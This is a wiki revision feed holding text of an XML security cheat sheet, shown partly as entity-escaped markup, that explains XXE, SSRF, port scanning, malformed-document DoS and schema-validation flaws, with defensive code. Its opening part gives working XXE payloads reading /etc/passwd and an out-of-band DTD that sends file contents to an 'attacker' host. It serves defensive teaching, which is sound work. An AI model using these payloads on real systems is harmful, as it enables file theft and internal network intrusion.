&amp;lt;SOAP:Envelope entityReference=&amp;quot;&amp;amp;LOL9;&amp;quot; xmlns:SOAP=&amp;quot;http://schemas.xmlsoap.org/soap/envelope/&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:Body&amp;gt; &lt;br /&gt;
    &amp;lt;keyword xmlns=&amp;quot;urn:parasoft:ws:store&amp;quot;&amp;gt;foo&amp;lt;/keyword&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:Body&amp;gt;&lt;br /&gt;
&amp;lt;/SOAP:Envelope&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
Consider the following example code of an XXE:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;ISO-8859-1&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT includeme ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY xxe SYSTEM &amp;quot;/etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;xxe;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous XML defines an external entity named &amp;lt;tt&amp;gt;xxe&amp;lt;/tt&amp;gt; that refers to the contents of &amp;lt;tt&amp;gt;/etc/passwd&amp;lt;/tt&amp;gt;; the entity is expanded within the &amp;lt;tt&amp;gt;root&amp;lt;/tt&amp;gt; element. If the parser allows references to external entities, it might include the contents of that file in the XML response or in the error output.&lt;br /&gt;
&lt;br /&gt;
=== Server Side Request Forgery ===&lt;br /&gt;
Server Side Request Forgery (SSRF) happens when the server receives a malicious XML schema that makes the server retrieve remote resources, such as a file via HTTP, HTTPS, or FTP. SSRF has been used to retrieve remote files, to prove an XXE when the file cannot be reflected back, to perform port scanning, and to perform brute force attacks on internal networks.&lt;br /&gt;
&lt;br /&gt;
==== External Connection ====&lt;br /&gt;
Whenever there is an XXE and you cannot retrieve a file, you can test if you would be able to establish remote connections:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [ &lt;br /&gt;
  &amp;lt;!ENTITY % xxe SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt; &lt;br /&gt;
  %xxe;&lt;br /&gt;
]&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== File Retrieval with Parameter Entities ====&lt;br /&gt;
Parameter entities allow for the retrieval of content using URL references. Consider the following malicious XML document:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY % file SYSTEM &amp;quot;file:///etc/passwd&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY % dtd SYSTEM &amp;quot;http://attacker/evil.dtd&amp;quot;&amp;gt;&lt;br /&gt;
  %dtd;&lt;br /&gt;
]&amp;gt;&lt;br /&gt;
&amp;lt;root&amp;gt;&amp;amp;send;&amp;lt;/root&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Here the DTD defines two external parameter entities: &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt;, which loads a local file, and &amp;lt;tt&amp;gt;dtd&amp;lt;/tt&amp;gt;, which loads a remote DTD. The remote DTD should contain something like this:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;!ENTITY % all &amp;quot;&amp;lt;!ENTITY send SYSTEM 'http://example.com/?%file;'&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
%all;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The second DTD causes the system to send the contents of the &amp;lt;tt&amp;gt;file&amp;lt;/tt&amp;gt; back to the attacker's server as a parameter of the URL. &lt;br /&gt;
&lt;br /&gt;
==== Port Scanning ====&lt;br /&gt;
The amount and type of information will depend on the type of implementation. Responses can be classified as follows, ranking from easy to complex:&lt;br /&gt;
&lt;br /&gt;
''' 1) Complete Disclosure '''&lt;br /&gt;
This is the simplest and most unusual scenario. With complete disclosure, you can clearly see what’s going on by receiving the complete responses from the server being queried. You have an exact representation of what happened when connecting to the remote host.&lt;br /&gt;
&lt;br /&gt;
''' 2) Error-based '''&lt;br /&gt;
If you are unable to see the response from the remote server, you may be able to use the error response. Consider a web service leaking details on what went wrong in the SOAP Fault element when trying to establish a connection: &lt;br /&gt;
 &amp;lt;pre&amp;gt;java.io.IOException: Server returned HTTP response code: 401 for URL: http://192.168.1.1:80&lt;br /&gt;
	at sun.net.www.protocol.http.HttpURLConnection.getInputStream(HttpURLConnection.java:1459)&lt;br /&gt;
	at com.sun.org.apache.xerces.internal.impl.XMLEntityManager.setupCurrentEntity(XMLEntityManager.java:674)&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
''' 3) Timeout-based '''&lt;br /&gt;
Timeouts could occur when connecting to open or closed ports depending on the schema and the underlying implementation. If a timeout occurs when trying to connect to a closed port (which may take one minute) while the response from an open port is very quick (one second, for example), the difference between open and closed ports becomes quite clear.&lt;br /&gt;
&lt;br /&gt;
''' 4) Time-based '''&lt;br /&gt;
Sometimes differences between closed and open ports are very subtle. The only way to know the status of a port with certainty would be to take multiple measurements of the time required to reach each host, then analyze the average time for each port to determine its status. This type of attack will be difficult to accomplish when performed in higher latency networks.&lt;br /&gt;
&lt;br /&gt;
==== Brute Forcing ====&lt;br /&gt;
Once an attacker confirms that it is possible to perform a port scan, performing a brute force attack is a matter of embedding the &amp;lt;tt&amp;gt;username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;password&amp;lt;/tt&amp;gt; as part of the URI. For example:&lt;br /&gt;
 &amp;lt;pre&amp;gt;foo://username:password@example.com:8080/&amp;lt;/pre&amp;gt;&lt;br /&gt;
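&lt;br /&gt;
To see which components such a URI carries, it can be split with the Python standard library. This sketch is illustrative only; the helper name &amp;lt;tt&amp;gt;has_embedded_credentials&amp;lt;/tt&amp;gt; is hypothetical and could be used to reject system identifiers that embed credentials:&lt;br /&gt;

```python
from urllib.parse import urlsplit


def has_embedded_credentials(uri):
    """Return True when the URI carries a username or password."""
    parts = urlsplit(uri)
    return parts.username is not None or parts.password is not None


# The example URI from above, split into its components.
parts = urlsplit("foo://username:password@example.com:8080/")
```

Here &amp;lt;tt&amp;gt;parts.username&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;parts.password&amp;lt;/tt&amp;gt; hold the guessed credentials, while &amp;lt;tt&amp;gt;parts.hostname&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;parts.port&amp;lt;/tt&amp;gt; identify the internal target.&lt;br /&gt;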
&lt;br /&gt;
=Authors and Primary Editors=&lt;br /&gt;
&lt;br /&gt;
[mailto:fernando.arnaboldi@ioactive.com Fernando Arnaboldi]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224424</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224424"/>
				<updated>2016-12-21T20:10:47Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet exposes how to exploit the different possibilities in libraries and software divided in two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using not well formed documents.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution once detecting a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To analyze the likelihood of this attack, analyze the time taken by a regular XML document vs the time taken by a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
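&lt;br /&gt;
The comparison described above can be sketched with the Python standard library parser. This is a minimal sketch under stated assumptions: the helper names, the document size, and the number of repetitions are all hypothetical, and the parser under test should be swapped for the one the application actually uses:&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def build_document(item_count):
    """Serialize a well-formed document with item_count child elements."""
    root = ET.Element("items")
    for index in range(item_count):
        ET.SubElement(root, "item").text = str(index)
    return ET.tostring(root)


def time_parse(document, repeats=20):
    """Return (average seconds per attempt, True if every parse succeeded)."""
    parsed_ok = True
    start = time.perf_counter()
    for _ in range(repeats):
        try:
            ET.fromstring(document)
        except ET.ParseError:
            parsed_ok = False
    return (time.perf_counter() - start) / repeats, parsed_ok


well_formed = build_document(1000)
# Cut the document just before the root closing tag to make it malformed.
malformed = well_formed[: well_formed.rfind(b"/items") - 1]
```

Calling &amp;lt;tt&amp;gt;time_parse&amp;lt;/tt&amp;gt; on both documents gives two averages to compare; a malformed document that takes noticeably longer than its well-formed counterpart deserves a closer look.&lt;br /&gt;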
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up —and eventually deplete— the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
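&lt;br /&gt;
The integrity check mentioned above could, for instance, compare the schema contents against a digest recorded when the schema was reviewed. The following Python sketch assumes SHA-256 as the digest and a hypothetical helper name; how the pinned value is stored and distributed is left open:&lt;br /&gt;

```python
import hashlib
import hmac


def schema_matches_pinned_digest(schema_bytes, pinned_sha256_hex):
    """Return True when the schema content hashes to the pinned SHA-256 value."""
    actual = hashlib.sha256(schema_bytes).hexdigest()
    # compare_digest avoids leaking the position of the first mismatch.
    return hmac.compare_digest(actual, pinned_sha256_hex.lower())
```

An application would read the schema file as bytes, call the helper, and refuse to validate documents when it returns &amp;lt;tt&amp;gt;False&amp;lt;/tt&amp;gt;.&lt;br /&gt;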
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to open one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
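&lt;br /&gt;
The effect of reading only the first matching element can be reproduced with the Python standard library. This is an illustrative sketch, not the bookseller's actual code: the helper names are hypothetical, and the tampered document is built programmatically to mirror the example above:&lt;br /&gt;

```python
import xml.etree.ElementTree as ET


def build_order(fields):
    """Build a buy element whose children follow the given (name, text) pairs."""
    order = ET.Element("buy")
    for name, value in fields:
        ET.SubElement(order, name).text = value
    return order


def has_expected_structure(order):
    """Accept only exactly one id followed by exactly one price."""
    return [child.tag for child in order] == ["id", "price"]


tampered = build_order([("id", "123"), ("price", "0"), ("id", ""), ("price", "10")])
# A lookup that returns the first match picks up the injected price.
naive_price = tampered.find("price").text
```

The naive lookup yields the injected price of 0, while the structural check rejects the tampered order before any value is read.&lt;br /&gt;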
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; is then defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt; as well as the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. After this definition begins the well-formed and valid XML document. The element name contains an irrelevant value but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain amount of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
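&lt;br /&gt;
When the schema language cannot express such limits, the application has to enforce them itself. The following Python sketch shows one way to do so; the pattern of one to three ASCII digits and the upper bound of 150 are assumptions chosen for illustration only:&lt;br /&gt;

```python
import re

# Assumed limits for illustration: one to three ASCII digits, value 0 to 150.
AGE_PATTERN = re.compile(r"[0-9]{1,3}")
MAX_AGE = 150


def is_valid_age(text):
    """Return True when text is a short digit string within the allowed range."""
    if AGE_PATTERN.fullmatch(text) is None:
        return False
    return MAX_AGE >= int(text)
```

The length limit in the pattern rejects the one-million-digit value before any numeric conversion is attempted.&lt;br /&gt;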
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
When schemas are insecurely defined and do not provide strict rules, they may expose the application to diverse situations. The result of this could be the disclosure of internal errors or documents that hit the application’s functionality with unexpected values.&lt;br /&gt;
&lt;br /&gt;
=== String Data Types ===&lt;br /&gt;
Provided you need to use a hexadecimal value, there is no point in defining this value as a string that will later be restricted to the specific 16 hexadecimal characters. To exemplify this scenario, when using XML encryption, some values must be encoded using base64. This is the schema definition of how these values should look:&lt;br /&gt;
 &amp;lt;element name=&amp;quot;CipherData&amp;quot; type=&amp;quot;xenc:CipherDataType&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;complexType name=&amp;quot;CipherDataType&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;choice&amp;gt;&lt;br /&gt;
    &amp;lt;element name=&amp;quot;CipherValue&amp;quot; type=&amp;quot;'''base64Binary'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;element ref=&amp;quot;xenc:CipherReference&amp;quot;/&amp;gt;&lt;br /&gt;
   &amp;lt;/choice&amp;gt;&lt;br /&gt;
  &amp;lt;/complexType&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous schema defines the element &amp;lt;tt&amp;gt;CipherValue&amp;lt;/tt&amp;gt; as a base64 data type. As an example, the IBM WebSphere DataPower SOA Appliance allowed any type of characters within this element after a valid base64 value and considered the content valid. The first portion of this data was properly checked as a base64 value, but the remaining characters could be anything else (including other sub-elements of the &amp;lt;tt&amp;gt;CipherData&amp;lt;/tt&amp;gt; element). Restrictions were only partially enforced for the element, which means that the information was probably tested by an application instead of the proposed sample schema.&lt;br /&gt;
&lt;br /&gt;
=== Numeric Data Types ===&lt;br /&gt;
Defining the correct data type for numbers can be more complex since there are more options than there are for strings. &lt;br /&gt;
&lt;br /&gt;
==== Negative and Positive Restrictions ====&lt;br /&gt;
XML Schema numeric data types can include different ranges of numbers. They could include:&lt;br /&gt;
* '''negativeInteger''': Only negative numbers&lt;br /&gt;
* '''nonNegativeInteger''': Positive numbers and the zero value&lt;br /&gt;
* '''positiveInteger''': Only positive numbers&lt;br /&gt;
* '''nonPositiveInteger''': Negative numbers and the zero value&lt;br /&gt;
The following sample document defines an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; for a product, a &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;, and a &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; value that is under the control of an attacker:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;1&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
  &amp;lt;quantity&amp;gt;'''1'''&amp;lt;/quantity&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
To avoid repeating old errors, an XML schema may be defined to prevent processing the incorrect structure in cases where an attacker wants to introduce additional elements:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;id&amp;quot; type=&amp;quot;xs:integer&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;price&amp;quot; type=&amp;quot;xs:decimal&amp;quot;/&amp;gt;&lt;br /&gt;
     &amp;lt;xs:element name=&amp;quot;quantity&amp;quot; type=&amp;quot;'''xs:integer'''&amp;quot;/&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
   &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Limiting &amp;lt;tt&amp;gt;quantity&amp;lt;/tt&amp;gt; to an integer data type will avoid any unexpected characters. Once the application receives the previous message, it may calculate the final price by doing &amp;lt;tt&amp;gt;price*quantity&amp;lt;/tt&amp;gt;. However, since this data type allows negative values, an attacker who provides a negative number might produce a negative result on the user’s account. To avoid that logical vulnerability, the schema should probably use &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; instead of &amp;lt;tt&amp;gt;integer&amp;lt;/tt&amp;gt;.&lt;br /&gt;
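&lt;br /&gt;
The effect of the data type choice can be sketched outside the schema. The following Python fragment is only an illustration: the helper names &amp;lt;tt&amp;gt;parse_quantity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;total&amp;lt;/tt&amp;gt; are hypothetical, and Python's &amp;lt;tt&amp;gt;int()&amp;lt;/tt&amp;gt; is more lenient than the lexical rules of the schema data types, so it approximates the value ranges rather than reproducing schema validation:&lt;br /&gt;

```python
from decimal import Decimal


def parse_quantity(text: str) -> int:
    """Accept only values in the positiveInteger value space (1, 2, 3, ...)."""
    value = int(text)  # raises ValueError for non-numeric input
    if value >= 1:
        return value
    raise ValueError(f"quantity must be a positive integer, got {value}")


def total(price: str, quantity: int) -> Decimal:
    """Compute the amount to charge as price * quantity."""
    return Decimal(price) * quantity


# With plain integer semantics, a negative quantity yields a negative charge.
print(total("10", int("-5")))  # prints -50

# With positive-integer semantics, the same input is rejected up front.
try:
    parse_quantity("-5")
except ValueError as err:
    print("rejected:", err)
```

Rejecting the value at the boundary, whether in the schema or in code, keeps the negative amount from ever reaching the price calculation.&lt;br /&gt;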
&lt;br /&gt;
==== Divide by Zero ====&lt;br /&gt;
Whenever using user controlled values as denominators in a division, developers should avoid allowing the number zero. In cases where the value zero is used for division in XSLT, the error &amp;lt;tt&amp;gt;FOAR0001&amp;lt;/tt&amp;gt; will occur. Other applications may throw other exceptions and the program may crash. Some XML schema data types exclude the zero value. For example, in cases where negative values and zero are not considered valid, the schema could specify the data type &amp;lt;tt&amp;gt;positiveInteger&amp;lt;/tt&amp;gt; for the element.&lt;br /&gt;
 &amp;lt;xs:element name=&amp;quot;denominator&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:simpleType&amp;gt;&lt;br /&gt;
   &amp;lt;xs:restriction base=&amp;quot;'''xs:positiveInteger'''&amp;quot;/&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:simpleType&amp;gt;&lt;br /&gt;
 &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The element &amp;lt;tt&amp;gt;denominator&amp;lt;/tt&amp;gt; is now restricted to positive integers. This means that only values greater than zero will be considered valid. If a schema uses a data type that still admits zero, a zero denominator may trigger an error.&lt;br /&gt;
&lt;br /&gt;
==== Special Values: Infinity and Not a Number (NaN) ====&lt;br /&gt;
The data types &amp;lt;tt&amp;gt;float&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;double&amp;lt;/tt&amp;gt; contain real numbers and some special values: &amp;lt;tt&amp;gt;-Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;-INF&amp;lt;/tt&amp;gt;, &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt;, and &amp;lt;tt&amp;gt;+Infinity&amp;lt;/tt&amp;gt; or &amp;lt;tt&amp;gt;INF&amp;lt;/tt&amp;gt;. These special values are useful in some contexts, but the types are often misused: they are commonly chosen for elements that should only ever hold real numbers, such as prices. This mistake is not specific to XML; it is common in programming languages as well.&lt;br /&gt;
Not considering the whole spectrum of possible values for a data type could make underlying applications fail. If the special values &amp;lt;tt&amp;gt;Infinity&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;NaN&amp;lt;/tt&amp;gt; are not required and only real numbers are expected, the data type &amp;lt;tt&amp;gt;decimal&amp;lt;/tt&amp;gt; is recommended:&lt;br /&gt;
 &amp;lt;xs:schema xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;buy&amp;quot;&amp;gt;&lt;br /&gt;
   &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
    &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
